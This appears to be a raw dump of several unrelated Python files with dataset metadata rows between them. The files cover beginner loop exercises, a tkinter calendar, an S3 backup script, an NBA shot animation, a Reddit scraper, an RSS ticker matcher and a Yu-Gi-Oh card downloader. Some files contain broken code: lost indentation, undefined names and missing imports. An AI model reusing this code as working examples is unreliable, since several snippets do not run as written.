for i in range(10): #Problem 3 - Reads one less number each time and adds a space for the missing number
for k in range(i):
print (" ", end = " ")
for j in range(0, j):
print(j, end = " ")
print()
print()
j = 10
for i in range(10): #Problem 3 Version 2 - Reads one less number each time
for j in range(0, j):
print(j, end = " ")
print()
print()
m = 10 #Starting range
j = 11 #Ending range
k = 9 #Starting Number
for i in range(9): #Problem 4
for m in range(m,j): #M is the start range, J is the end range. They are variables so they can scale properly
j = j + 1 #Increases the ending by 1
k = k + 1 #Increases the set number to be printed
print(k, end = " ")
print()
print()
#Not much explained above since the professor gave away most of the Problem
#end = " " is a string function to add a space between characters instead of a new line each read through | true |
b4cb00d7ef3db7e63e8dcf366f757136441081d8 | Python | dhchoi/TransitionBasedParsing | /Transition.py | UTF-8 | 579 | 3.4375 | 3 | [] | no_license | #!/usr/bin/env python
class Transition:
# Transition types
Shift = 0
LeftArc = 1
RightArc = 2
def __init__(self, transitionType, label):
self.transitionType = transitionType
self.label = label
def __str__(self):
return 'Transition of type %d with label %s' % (self.transitionType, self.label)
def __repr__(self):
return str(self)
def __eq__(self, other):
return self.transitionType == other.transitionType and self.label == other.label
def __ne__(self, other):
return not (self == other)
| true |
c68c3d0177b7247e02ebce71016f622b8683e3d4 | Python | emiranda04/python-read-outlook-mails | /tkcalendar.py | UTF-8 | 4,101 | 2.671875 | 3 | [] | no_license | from tkinter import *
from tkinter import ttk
import calendar
from datetime import datetime,date
class TkCalendar(Frame):
def __init__(self, master=None,dt=None):
self.status = 'Ok'
super().__init__(master)
self.grid(row=0, column=0, sticky=N + E + S + W)
self['bg'] = 'black'
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
if dt is None:
self.dt = date.today()
if isinstance(dt,(date)):
self.dt = dt
else:
self.status ='Invalid parameter type {str(dt)}. Should be datetime.date'
self.month = StringVar()
self.year = StringVar()
self.create_widget()
def create_widget(self):
self.container = Frame(self)
self.container.grid(row=0,column=0,sticky=N+E+W+S)
self.container.rowconfigure(0, weight=1)
self.container.columnconfigure(0, weight=1)
cbo_month = ttk.Combobox(self.container,values=calendar.month_abbr[1:],textvariable=self.month)
cbo_month.grid(row=0,column=0,columnspan=4,sticky=N + E + S + W)
cbo_month.rowconfigure(0, weight=1)
cbo_month.columnconfigure(0, weight=1)
cbo_month.bind("<<ComboboxSelected>>", lambda x: self.update_calendar(x, 'M'))
self.month.set(calendar.month_abbr[self.dt.month])
cbo_year = ttk.Combobox(self.container,values=range(self.dt.year-2, self.dt.year),textvariable=self.year)
cbo_year.grid(row=0,column=5,columnspan=4,sticky=N + E + S + W)
cbo_year.rowconfigure(0, weight=1)
cbo_year.columnconfigure(5, weight=1)
self.year.set(self.dt.year)
cbo_year.bind("<<ComboboxSelected>>", lambda x: self.update_calendar(x,'Y'))
self.frm_weekday = Frame(self.container)
self.frm_weekday.grid(row=10,column=0,sticky=N+E+W+S,columnspan=8)
self.frm_weekday.rowconfigure(0, weight=1)
self.frm_weekday.columnconfigure(0, weight=1)
self.create_date_widget(self.frm_weekday)
def create_date_widget(self,frm_weekday):
lbl_mo = ttk.Label(frm_weekday,text='MO')
lbl_mo.grid(row=0,column=0,sticky=N+E+W+S)
lbl_mo.columnconfigure(0,weight=1)
lbl_mo.rowconfigure(0, weight=1)
lbl_tu = ttk.Label(frm_weekday, text='TU')
lbl_tu.grid(row=0, column=4, sticky=N + E + W + S)
lbl_tu.columnconfigure(0, weight=1)
lbl_tu.rowconfigure(0, weight=1)
lbl_we = ttk.Label(frm_weekday, text='WE')
lbl_we.grid(row=0, column=8, sticky=N + E + W + S)
lbl_we.columnconfigure(0, weight=1)
lbl_we.rowconfigure(0, weight=1)
lbl_th = ttk.Label(frm_weekday, text='TH')
lbl_th.grid(row=0, column=12, sticky=N + E + W + S)
lbl_th.columnconfigure(0, weight=1)
lbl_th.rowconfigure(0, weight=1)
lbl_fr = ttk.Label(frm_weekday, text='FR')
lbl_fr.grid(row=0, column=16, sticky=N + E + W + S)
lbl_fr.columnconfigure(0, weight=1)
lbl_fr.rowconfigure(0, weight=1)
lbl_sa = ttk.Label(frm_weekday, text='SA')
lbl_sa.grid(row=0, column=20, sticky=N + E + W + S)
lbl_sa.columnconfigure(0, weight=1)
lbl_sa.rowconfigure(0, weight=1)
lbl_su = ttk.Label(frm_weekday, text='SU')
lbl_su.grid(row=0, column=24, sticky=N + E + W + S)
lbl_su.columnconfigure(0, weight=1)
lbl_su.rowconfigure(0, weight=1)
c = calendar.Calendar()
row = 5
col = 0
print ((calendar.month_abbr[1:].index(self.month.get())))
print ((self.year.get()))
for item in c.itermonthdays2(int(self.year.get()),calendar.month_abbr[0:].index(self.month.get())):
val = '' if item[0] == 0 else item[0]
if val != '':
val = '0' + str(val) if len(str(val)) == 1 else val
btn_day = ttk.Button(frm_weekday,text=val,command=lambda arg=val:self.return_date(arg))
if val == '':
btn_day.state(["disabled"])
btn_day.grid(row=row,column=col,sticky=N+E+S+W)
btn_day.columnconfigure(row, weight=1)
btn_day.rowconfigure(col, weight=1)
col += 4
if item[1] == 6:
col = 0
row += 5
def return_date(self,arg):
self.dt_selected = str(self.year.get()) + '-' + str(self.month.get()) + '-' + str(arg)
def update_calendar(self,event,type):
self.create_date_widget(self.frm_weekday)
if __name__ == '__main__':
root = Tk()
root.columnconfigure(0, weight=1)
root.rowconfigure(0, weight=1)
root.title("CALENDAR")
app = TkCalendar(master=root)
app.mainloop()
| true |
6dc54feb55fbcf3154da535aed2c5a68707ff4a2 | Python | meta-434/bACHup | /bachup.py | UTF-8 | 3,407 | 2.609375 | 3 | [
"MIT"
] | permissive | #created by Alex Hapgood
#Started 02/2018
import boto3
import os
import platform
import datetime
import textwrap
import string
import random
import distutils
build = 'v0.2a7(inc)'
now = datetime.datetime.now()
class payload:
def __init__(self, id, source, time):
self.source = source
self.id = id
self.time = date
#Takes a payload instance, assigns variables, and writes to prefs.txt
def writeToPrefs(payloadInstance):
payloadInstance.id = id_generator()
payloadInstance.time = str(now)
payloadInstance.source = input('Enter target source: ')
with open('prefs.txt', 'a') as f:
f.write('\n' + self.id + ' | ' + self.source + ' | ' + self.time)
f.close()
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
def startUp():
global build
print('#' * 80)
print('# '' _ ______ _ _ ______ __ '' #\n'
'# ''| | /\ / _____) | | | / __ |/ | '' #\n'
'# ''| | _ / \ | / | |___| |_ _ ____ ____| | //| /_/ | ____ '' #\n'
'# ''| || \ / /\ \| | | ___ | | | | _ \ / ___) |// | | | |/ _ |'' #\n'
'# ''| |_) ) |__| | \_____| | | | |_| | | | | | | | /__| | | ( ( | |'' #\n'
'# ''|____/|______|\______)_| |_|\____| ||_/ |_| \_____(_)|_|\_||_|'' #\n'
'# '' |_| '' #\n'
'# '' '' #')
print('# By Alex H. '' #')
print('#' * 80)
print('\nSystem platform is ++%s++ running release ++%s++.\n' % (platform.system(), platform.release()))
print('current build is %s' % build)
def init():
payloadPath = ''
idHistory = []
s3 = boto3.client('s3')
response = s3.list_buckets()
buckets = [bucket['Name'] for bucket in response ['Buckets']]
existPrefs = input('Would you like to use an exiting prefs.txt file? y/n ')
if existPrefs == "y" or existPrefs == "Y":
with open('prefs.txt') as ins:
history = [line.rstrip('\n') for line in ins]
for item in history:
idHistory.append(item[:6])
print("\nBucket list: %s" % buckets)
print("idHistory list: %s" % idHistory)
#print(set(idHistory).intersection(set(buckets)))
if bool(set(idHistory).intersection(set(buckets))):
print("SUCCESS - MATCH FOUND.\n")
else:
print("NO MATCHING BUCKETS FOUND.\n")
ins.close()
inOrOut = input('[B]ackup / [R]estore? ')
if inOrOut == "B" or inOrOut == "b":
payloadPath = input('Enter the full filepath to the source enclosing folder or single file: ')
else:
restoreBucket = input("Enter id of bucket to preview contents for restore: ")
sys.exit(1)
def payloadLocate():
if os.path.exists(payloadPath) and os.path.isdir(payloadPath):
print(os.listdir(source))
return os.listdir(source)
else:
print('no such file or directory.')
def main():
startUp()
init()
payloadLocate()
if __name__ == "__main__":
print(main())
| true |
9b0b1354f1b9df77b78fc2c32a58a617e2e6d751 | Python | dimitrisnikolaou10/nba_shot_probability_sportvu | /animate/Event.py | UTF-8 | 9,340 | 2.921875 | 3 | [] | no_license | from Moment import Moment
from Constant import Constant
import matplotlib.pyplot as plt
from matplotlib import animation
from moviepy.editor import *
class Event:
""" A class for handling and showing events """
def __init__(self, moments, player_info, event_description, probability_to_make, shot_time, feat_info):
moments_list = [] # Create list of moments (11 rows of the dataframe)
first_index_of_moment, last_index_of_moment, last_index = 0, 11, len(moments) - 1
while last_index_of_moment <= last_index:
df_temp = moments.iloc[first_index_of_moment:last_index_of_moment, :]
moments_list.append(df_temp)
first_index_of_moment, last_index_of_moment = last_index_of_moment, last_index_of_moment + 11
self.moments = [Moment(moment) for moment in moments_list] # store the list in self.moments
player_ids = player_info[0]
player_names = player_info[1]
player_jerseys = player_info[2]
values = list(zip(player_names, player_jerseys))
# Dictionary for player ids that contains Name, Jersey Number
self.player_ids_dict = dict(zip(player_ids, values))
self.event_description = event_description
self.probability_to_make = probability_to_make
self.shot_time = shot_time
self.feat_info = feat_info # tuple with -> [0] opp_1_dist, [1] opp_2_dist, [2] opp_3_dist, [3] ts%
# This function runs iteratively and updates all circles and clock - it is called by the animation function
def update_radius(self, i, player_circles, ball_circle, annotations, clock_info, shot, feature_info):
moment = self.moments[i] # obtain the moment
for j, circle in enumerate(player_circles): # repeat for all players
circle.center = moment.players[j].x, moment.players[j].y # center of circle is x,y coordinates
annotations[j].set_position(circle.center) # add the number of the jersey
clock_test = 'Quarter {:d}\n {:02d}:{:02d}\n {:03.1f}'.format( # format the clock
moment.quarter,
int(moment.game_clock) % 3600 // 60,
int(moment.game_clock) % 60,
moment.shot_clock)
if self.shot_time + 2 + 2 > moment.game_clock > self.shot_time + 2 - 2:
shot.set_color('black')
shot.set_position([39, 5])
feature_info.set_color('black')
feature_info.set_position([44, 2])
else:
shot.set_color('white')
shot.set_position([-5, -5])
feature_info.set_color('white')
feature_info.set_position([-15, -15])
clock_info.set_text(clock_test) # add the clock text based on above
ball_circle.center = moment.ball.x, moment.ball.y # center of ball circle, the x,y coordinates
ball_circle.radius = moment.ball.radius / Constant.NORMALIZATION_COEF # adjust the radius based on height
return player_circles, ball_circle
def show(self):
# Leave some space for inbound passes
ax = plt.axes(xlim=(Constant.X_MIN,
Constant.X_MAX),
ylim=(Constant.Y_MIN,
Constant.Y_MAX))
ax.axis('off')
fig = plt.gcf()
ax.grid(False) # Remove grid
start_moment = self.moments[0]
player_dict = self.player_ids_dict
# mark the shot probability
shot = ax.annotate('Shot probability: ' + str(self.probability_to_make) + '%', xy=[0, 0],
color='white', horizontalalignment='center',
verticalalignment='center', fontweight='bold')
# mark the feature information (opponent distances and ts%)
feature_info = ax.annotate('Closest Opp. distances: ' + str(round(self.feat_info[0], 1)) + ', ' +
str(round(self.feat_info[1], 1)) + ', ' +
str(round(self.feat_info[2], 1)),
xy=[0, 0], color='white', horizontalalignment='center',
verticalalignment='center', fontweight='bold')
# mark the clock (to be precise, note the spot where the clock will be placed)
clock_info = ax.annotate('', xy=[Constant.X_CENTER, Constant.Y_CENTER],
color='black', horizontalalignment='center',
verticalalignment='center')
# mark the jersey numbers on the players
annotations = [ax.annotate(self.player_ids_dict[player.id][1], xy=[0, 0], color='w',
horizontalalignment='center',
verticalalignment='center', fontweight='bold')
for player in start_moment.players]
# Prepare table
# Sort players so you know that in next step you get home team player
sorted_players = sorted(start_moment.players, key=lambda player: player.team.id)
# You now know where there is a home team player and where there is an away team player
home_player = sorted_players[0]
guest_player = sorted_players[5]
# Name the columns based on the name of the teams, also obtain the colour
column_labels = tuple([home_player.team.name, guest_player.team.name])
column_colours = tuple([home_player.team.color, guest_player.team.color])
cell_colours = [column_colours for _ in range(5)]
# Obtain home and away players in Name, Jersey Number format and zip the two lists
home_players = [' #'.join([player_dict[player.id][0], player_dict[player.id][1]]) for player in
sorted_players[:5]]
guest_players = [' #'.join([player_dict[player.id][0], player_dict[player.id][1]]) for player in
sorted_players[5:]]
players_data = list(zip(home_players, guest_players))
# Create the table based on all the previous info (player table)
table = plt.table(cellText=players_data,
colLabels=column_labels,
colColours=column_colours,
colWidths=[Constant.COL_WIDTH, Constant.COL_WIDTH],
loc='top',
cellColours=cell_colours,
fontsize=Constant.FONTSIZE,
cellLoc='center')
table.scale(1, Constant.SCALE)
table_cells = table.properties()['child_artists']
for cell in table_cells:
cell._text.set_color('white')
# Create the second table that goes under. This table will contain description and probability.
# If you want to add second row you have to do [[self.event_description], [xxx]]
# If you want to add second col you have to do [['xxx','xxx']] and also change the colWid to [0.3,0.3]
table = plt.table(cellText=[[self.event_description],
['Probability for shot to go in: ' + str(self.probability_to_make)]],
loc='bottom',
colWidths=[0.6],
cellColours=[['#bcd0e2'], ['#bcd0e2']],
cellLoc='center',
# rowLabels=['Description'],
fontsize=Constant.FONTSIZE)
table.scale(1, Constant.SCALE)
table_cells = table.properties()['child_artists']
for cell in table_cells:
cell._text.set_color('black')
# create 10 player circles and 1 ball circle and add to ax
player_circles = [plt.Circle((0, 0), Constant.PLAYER_CIRCLE_SIZE, color=player.color)
for player in start_moment.players]
ball_circle = plt.Circle((0, 0), Constant.PLAYER_CIRCLE_SIZE,
color=start_moment.ball.color)
for circle in player_circles:
ax.add_patch(circle)
ax.add_patch(ball_circle)
# This is the most important function. It call a function iteratively. The function is update_radius.
# With fargs, I pass all arguments needed for update_radius. Update radius first argument is always the
# frame that we are at. The arguments are the created circles for players and ball, the jersey numbers
# that follow the circles and the clock. If you want to speed up, lower the interval.
anim = animation.FuncAnimation(
fig, self.update_radius,
fargs=(player_circles, ball_circle, annotations, clock_info, shot, feature_info),
frames=len(self.moments), interval=Constant.INTERVAL)
# Add the basketball court in the plot
court = plt.imread('../data/court.png')
plt.imshow(court, zorder=0, extent=[Constant.X_MIN, Constant.X_MAX - Constant.DIFF,
Constant.Y_MAX, Constant.Y_MIN])
# anim.save('../animations/animation.mp4', writer='ffmpeg', fps=25) # save file as mp4
# clip = (VideoFileClip("animations/Curry 28' 3PT Pullup Jump Shot (12 PTS).mp4")) # convert to gif
# clip.write_gif("animations/Curry.gif")
plt.show()
| true |
e5db77cd9936b78bb408c4adfa7afc006708e8ad | Python | BiniyamMelaku2/alx-system_engineering-devops | /0x16-api_advanced/1-top_ten.py | UTF-8 | 784 | 3.28125 | 3 | [] | no_license | #!/usr/bin/python3
"""
queries the Reddit API and prints the titles of the
first 10 hot posts listed for a given subreddit.
https://www.reddit.com/r/programming/hot/.json&limit=10
"""
import json
import requests
def top_ten(subreddit):
"""Return Top10 subreddit hot posts"""
url = "https://www.reddit.com/r/"
url = url + subreddit + "/hot/.json?limit=10"
headers = {
'User-Agent': 'My User Agent 1.0',
'From': '149@holbertonschool.com'
}
result = requests.get(url, headers=headers)
if result.status_code == 200:
result = result.json()
children = result.get('data').get('children')
for i in range(10):
title = children[i].get('data').get('title')
print("{}".format(title))
else:
print("None")
| true |
0d1cc00196f9e66304060292ae245c2b82a876c0 | Python | akauntz/jetson | /packer/rss.py | UTF-8 | 4,306 | 2.65625 | 3 | [] | no_license | import csv
import requests
import xml.etree.ElementTree as ET
import re
from datetime import datetime, timedelta
def loadRSS():
# url of rss feed
url = 'https://www.cnbc.com/id/10000664/device/rss/rss.html'
# creating HTTP response object from given url
resp = requests.get(url)
# saving the xml file
with open('cnbc.xml', 'wb') as cnbc:
cnbc.write(resp.content)
def parseXML(xmlfile):
# create element tree object
tree = ET.parse(xmlfile)
# get root element
root = tree.getroot()
candidate=""
newsitems = []
for item in root.findall('./channel/item'):
for child in item:
if child.tag == 'description':
#candidate=child.text
newsitems.append(child.text)
return newsitems
def savetoCSV(newsitems, filename):
with open(filename, 'w') as writeFile:
writer = csv.writer(writeFile)
writer.writerows(newsitems)
def findsym_nasdaq(newsitem):
with open('packer/nasdaq.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
symb="none"
for row in csv_reader:
if line_count == 0:
line_count += 1
else:
stock=row[1].replace(",", "")
stock=stock.replace(" Corporation", "")
stock=stock.replace(" Inc.", "")
stock=stock.replace(" Ltd.", "")
stock=stock.replace(" Limited", "")
stock=stock.replace(" Corp.", "")
stock=stock.replace(" Corp", "")
stock=stock.replace(" Ltd", "")
stock=stock.replace(" Inc", "")
stock=stock.replace(" LLC", "")
stock=stock.replace(".com", "")
if(stock in newsitem):
#print(row[0])
symb=row[0]
line_count += 1
return symb
def findsym_nyse(newsitem):
    """Return the NYSE ticker whose company name appears in *newsitem*.

    Reads 'packer/nyse.csv' (symbol, company name, ...), strips common
    corporate suffixes/prefixes from each listed name and substring-matches
    it against the headline. Financial-sector tickers (see ``financers``)
    are de-prioritised: once one matches, the last *non*-financial match is
    preferred via ``watch``/``temp_symb``. Returns "none" when no match.
    """
    with open('packer/nyse.csv') as csv_file:
        csv_reader = csv.reader(csv_file, delimiter=',')
        line_count = 0
        symb="none"
        # Tickers of banks/brokers that over-match generic market headlines.
        financers=["MS", "GS", "SFB", "SF^B","CS","SF^A", "SF","C^J","C","C^S","C^K","DB","C^N","EVR"]
        watch=0;
        temp_symb="none"
        repeat=0;
        for row in csv_reader:
            if line_count == 0:
                # Skip the CSV header row.
                line_count += 1
            else:
                #stock=row[1]
                # Normalise the listed company name before matching; the
                # replacement order matters (longer variants first).
                stock=row[1].replace(",", "")
                stock=stock.replace(" Corporation", "")
                stock=stock.replace(" Inc.", "")
                stock=stock.replace(" Ltd.", "")
                stock=stock.replace(" Limited", "")
                stock=stock.replace(" Corp.", "")
                stock=stock.replace(" Corp", "")
                stock=stock.replace(" Ltd", "")
                stock=stock.replace(" Inc", "")
                stock=stock.replace(" LLC", "")
                stock=stock.replace(" LP", "")
                stock=stock.replace(" Company", "")
                stock=stock.replace(" Co", "")
                stock=stock.replace(" &", "")
                stock=stock.replace(" (The)", "")
                stock=stock.replace(" Financial", "")
                stock=stock.replace(" L.P.", "")
                stock=stock.replace(" AG", "")
                stock=stock.replace(" PLC", "")
                stock=stock.replace(" Group", "")
                stock=stock.replace(" Holdings", "")
                stock=stock.replace(" International", "")
                stock=stock.replace("Walt ", "")
                stock=stock.replace("Harley-Davidson", "Harley")
                #if stock
                #print("\""+row[0]+"\",\""+ stock +"\"")
                if stock in newsitem:
                    symb=row[0]
                    #repeat=1;
                    if symb not in financers:
                        # Remember the most recent non-financial match.
                        temp_symb=symb
                    else:
                        # A financial ticker matched: from now on prefer
                        # temp_symb over the raw match.
                        watch=1
            if watch==1:
                symb=temp_symb
            line_count += 1
    return symb
def parser():
    """Refresh the cached feed on disk and return its parsed descriptions."""
    loadRSS()
    return parseXML('cnbc.xml')
def symbolget(newsitem):
    """Look up a ticker for *newsitem*: NYSE first, NASDAQ as fallback."""
    nyse_symbol = findsym_nyse(newsitem)
    if nyse_symbol != "none":
        return nyse_symbol
    return findsym_nasdaq(newsitem)
| true |
796212d2cc6982dbbd48d42eaf4579942321d156 | Python | hscleandro/COVIDcases | /plot.py | UTF-8 | 3,496 | 3.140625 | 3 | [
"MIT"
] | permissive | # Calculate the number of cases with a decreasing R-number
# For information only. Provided "as-is" etc.
# Import our modules that we are using
import matplotlib.pyplot as plt
import numpy as np
import math
import matplotlib.dates as mdates
import datetime as dt
from matplotlib.font_manager import FontProperties
from datetime import datetime
# VARIABLES
# number of infectious people ('besmettelijken') on day zero in the Netherlands
# startdate in m/d/yyyy
numberofcasesdayzero = [331]
STARTDATE = "12/15/2020"
NUMBEROFDAYS = 90
TURNINGPOINTDAY = 5
# R-numbers. Decrease and increase in two seperate figures
Rold = 1.2
Rvalues = [[0.95, 0.9,0.85, 0.8,0.75, 0.7]]
# Some manipulation of the x-values
startx = dt.datetime.strptime(STARTDATE,'%m/%d/%Y').date()
then = startx + dt.timedelta(days=NUMBEROFDAYS)
x = mdates.drange(startx,then,dt.timedelta(days=1))
# x = day number counted from 1 January 1970 (matplotlib date numbers)
# y = number of cases
# z = day number from 1 to NUMBEROFDAYS
z = np.array(range(NUMBEROFDAYS))
k = []
date_format = "%m/%d/%Y"
a = datetime.strptime(STARTDATE, date_format)
# Here we go: one curve per target R value, starting from the day-zero count.
for s in numberofcasesdayzero:
    for Rx in Rvalues:
        for R in Rx:
            # nested list because first I had two graphs (one for r>1 and another one for r<1)
            k.append (s)
            Rnew = R
            for t in range(1, NUMBEROFDAYS):
                # R decreases linearly from Rold to Rnew during the first
                # TURNINGPOINTDAY days, then stays at Rnew.
                if t<TURNINGPOINTDAY :
                    Ry = Rold - (t/TURNINGPOINTDAY * (Rold - Rnew))
                else:
                    Ry = Rnew
                if Ry == 1:
                    # prevent an [divide by zero]-error
                    Ry = 1.000001
                # Doubling/halving time assuming a 4-day generation interval.
                thalf = 4 * math.log(0.5) / math.log(Ry)
                k.append( k[t-1] * (0.5**(1/thalf)))
            labelx = 'Rnew = ' + str(R)
            plt.plot(x,k,label =labelx)
            k = []
# Add X and y Label and limits
plt.xlabel('date')
plt.xlim(x[0], x[-1])
plt.ylabel('positive tests per 100k inhabitants in 7 days')
plt.ylim(0,450)
# add horizontal lines and surfaces (Dutch alert levels, low to very high)
plt.fill_between(x, 0, 49, color='yellow', alpha=0.3, label='waakzaam')
plt.fill_between(x, 50, 149, color='orange', alpha=0.3, label='zorgelijk')
plt.fill_between(x, 150, 249, color='red', alpha=0.3, label='ernstig')
plt.fill_between(x, 250, 499, color='purple', alpha=0.3, label='zeer ernstig')
plt.fill_between(x, 500, 600, color='grey', alpha=0.3, label='zeer zeer ernstig')
plt.axhline(y=0, color='green', alpha=.6,linestyle='--' )
plt.axhline(y=49, color='yellow', alpha=.6,linestyle='--')
plt.axhline(y=149, color='orange', alpha=.6,linestyle='--')
plt.axhline(y=249, color='red', alpha=.6,linestyle='--')
plt.axhline(y=499, color='purple', alpha=.6,linestyle='--')
plt.axvline(x=x[0]+35, color='purple', alpha=.6,linestyle='--',label = "19/01/2021")
# Add a grid
plt.grid(alpha=.4,linestyle='--')
#Add a Legend
fontP = FontProperties()
fontP.set_size('xx-small')
plt.legend( loc='upper right', prop=fontP)
# Add a title
titlex = (
    'Pos. tests per 100k inhabitants in 7 days.\n'
    'Number of cases on '+ str(STARTDATE) + ' = ' + str(numberofcasesdayzero) + '\n'
    'Rold = ' + str(Rold) +
    ' // Rnew reached in ' + str(TURNINGPOINTDAY) + ' days (linear decrease)' )
plt.title(titlex , fontsize=10)
# lay-out of the x axis
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=5))
plt.gcf().autofmt_xdate()
# Show the plot
plt.show()
| true |
22c6d978cd00b7a11c310d5709b9334ba7fc11b5 | Python | garam-park/elice-algorithm1-2018 | /ch01_recursive/ex03.py | UTF-8 | 583 | 3.5 | 4 | [] | no_license | '''
올바른 괄호인지 판단하기
https://academy.elice.io/courses/339/lectures/2416/materials/5
'''
def checkParen(p):
    """Return "YES" if *p* is a balanced parenthesis string, else "NO".

    Repeatedly deletes the first adjacent "()" pair; a string is balanced
    exactly when this reduction ends in the empty string.

    Bug fix: the original was a SyntaxError (missing ':' after the inner
    ``if``); the redundant len == 2 special case is also folded into the
    general reduction.
    """
    if len(p) == 0:
        return "YES"
    for i in range(len(p) - 1):
        if p[i] == "(" and p[i + 1] == ")":
            # Drop this innermost pair and test the remainder.
            return checkParen(p[:i] + p[i + 2:])
    # Characters remain but no adjacent pair is left -> unbalanced.
    return "NO"
def main():
    '''
    Do not change this code
    '''
    # Reads one line from stdin and prints whether it is balanced.
    x = input()
    print(checkParen(x))
if __name__ == "__main__":
main()
| true |
050b4c3261ab1c0391097d4441f142720fcbf2b4 | Python | profran/YGOCardDownloader | /DownloadMain.ydk.py | UTF-8 | 4,348 | 2.59375 | 3 | [] | no_license | #!/usr/bin/env python
import requests
import os
clear = lambda: os.system('cls')
def newDeckPrint():
    """Interactively pick a .ydk deck from the working directory and fetch it.

    Lists every *.ydk file, prompts for its index until a valid one is
    given, then delegates to downloadImages() for the chosen deck.
    """
    clear()
    print("Welcome to Yu-Gi-Oh PDF printable cards!\n")
    dir = os.getcwd()
    deckArray = []
    for file in os.listdir(dir):
        if (file.endswith(".ydk")):
            deckArray.append(file)
    print("Wich deck do you want to download?: \n")
    for deck, x in zip(deckArray, range(0, len(deckArray))):
        print("-->({0}): ".format(x) + deck)
    while (True):
        selectedDeck = int(input("--> "))
        # Bug fix: the original accepted selectedDeck == len(deckArray)
        # (IndexError) and negative values (silent wrap-around).
        if 0 <= selectedDeck < len(deckArray):
            break
    clear()
    print("Now downloading " + str(deckArray[selectedDeck])[:-4] + "... \n")
    downloadImages(str(deckArray[selectedDeck]))
def resizeImage(infile, output_dir="", size=(1024,768)):
    """Write a thumbnail copy of *infile* (JPEG only) into *output_dir*.

    The copy is named '<stem>_resized<ext>' and bounded by *size* while
    keeping the aspect ratio; non-.jpg files are ignored.

    NOTE(review): relies on PIL's ``Image``, which is never imported in
    this module -- confirm ``from PIL import Image`` is added before use.
    """
    outfile = os.path.splitext(infile)[0]+"_resized"
    extension = os.path.splitext(infile)[1]
    # Bug fix: the original used Python 2's cmp(), which is a NameError on
    # Python 3; a plain inequality expresses the same "skip non-jpg" check.
    if extension != ".jpg":
        return
    if infile != outfile:
        try :
            im = Image.open(infile)
            im.thumbnail(size, Image.ANTIALIAS)
            im.save(output_dir+outfile+extension,"JPEG")
        except IOError:
            print("cannot reduce image for ", infile)
def downloadImages(deckName):
    """Download every card image listed in the .ydk file *deckName*.

    Card ids are read from the deck list (lines not containing '#' or '!'),
    fetched from ygoprodeck, and stored as '<index>.jpg' inside a folder
    named after the deck. Each card is retried until the server returns 200.
    """
    urls = []
    lines = []
    directory = os.getcwd()
    with open(deckName) as f:
        for line in f:
            if ('#' not in line and '!' not in line):
                # Bug fix: strip surrounding whitespace; the original kept
                # the trailing newline inside the URL ('.../<id>\n.jpg').
                card_id = line.strip()
                urls.append("https://www.ygoprodeck.com/pics/" + card_id + ".jpg")
                lines.append(card_id)
    totalDownloads = len(urls)
    for x, y in zip(urls, range(0, (totalDownloads))):
        while (True):
            print("Downloading card " + str(y) + " out of " + str(totalDownloads))
            headers = {"authority" : "www.ygoprodeck.com",
                        "method" : "GET",
                        "path" : str(lines[y]),
                        "scheme" : "https",
                        "accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
                        "accept-encoding" : "gzip, deflate, br",
                        "accept-language" : "en-US,es-AR;q=0.8,es;q=0.6,en;q=0.4",
                        "cache-control" : "max-age=0",
                        "cookie" : "__cfduid=d44a7d84ccf5584239828478ed1850abf1508689423; _ga=GA1.2.324886416.1508689429; _gid=GA1.2.1979240285.1508689429",
                        "upgrade-insecure-requests" : "1",
                        "user-agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"}
            # Bug fix: the original issued a throwaway GET (without headers)
            # before this one, doubling traffic for no benefit.
            r = requests.get(x, headers=headers)
            print(r.status_code)
            if(r.status_code == requests.codes.ok):
                filename = str(y) + ".jpg"
                cardDirectory = os.path.join(str(directory), str(deckName[:-4]))
                if not os.path.exists(cardDirectory):
                    os.makedirs(cardDirectory)
                # Bug fix: write mode 'wb' (truncate) instead of append 'ab',
                # so a retry or re-run does not concatenate JPEG data.
                with (open(os.path.join(cardDirectory, filename), 'wb')) as fh:
                    fh.write(r.content)
                break
    downloadImage(urls, deckName)
def downloadImage(urls, deckName):
    """Interactively re-download individual cards by index until blank input.

    Args:
        urls: full image URL list built by downloadImages().
        deckName: deck file name ('.ydk'); the target folder is its stem.
    """
    print("Do you need to re-download a card?")
    while(True):
        election = input("Card number: ")
        if (str(election) == ""):
            break
        else:
            directory = os.getcwd()
            # Bug fix: the original referenced ``x`` and ``lines[y]`` from
            # another function's scope (NameError at runtime); derive the
            # URL from the entered index instead.
            url = urls[int(election)]
            print("Downloading card " + str(election))
            headers = {"authority" : "www.ygoprodeck.com",
                        "method" : "GET",
                        "path" : url,
                        "scheme" : "https",
                        "accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
                        "accept-encoding" : "gzip, deflate, br",
                        "accept-language" : "en-US,es-AR;q=0.8,es;q=0.6,en;q=0.4",
                        "cache-control" : "max-age=0",
                        "cookie" : "__cfduid=d44a7d84ccf5584239828478ed1850abf1508689423; _ga=GA1.2.324886416.1508689429; _gid=GA1.2.1979240285.1508689429",
                        "upgrade-insecure-requests" : "1",
                        "user-agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"}
            r = requests.get(url, headers=headers)
            filename = "re-download-" + str(election) + ".jpg"
            cardDirectory = os.path.join(str(directory), str(deckName[:-4]))
            if not os.path.exists(cardDirectory):
                os.makedirs(cardDirectory)
            # 'wb' (truncate) keeps retries from appending to an old image.
            with (open(os.path.join(cardDirectory, filename), 'wb')) as fh:
                fh.write(r.content)
if __name__ == '__main__':
newDeckPrint()
'''
if __name__=="__main__":
output_dir = "resized"
dir = os.getcwd()
if not os.path.exists(os.path.join(dir,output_dir)):
os.mkdir(output_dir)
for file in os.listdir(dir):
resizeImage(file,output_dir)
''' | true |
9fefadd175f597f77f515d933e8e9ea09091a833 | Python | figueiredo-alef/estudo-python | /exemplos/ex006.py | UTF-8 | 206 | 3.78125 | 4 | [
"MIT"
] | permissive | print('=' * 5, 'EX_006', '=' * 5)
# Read an integer and report its double, triple and square root
# (prompts and output are in Portuguese).
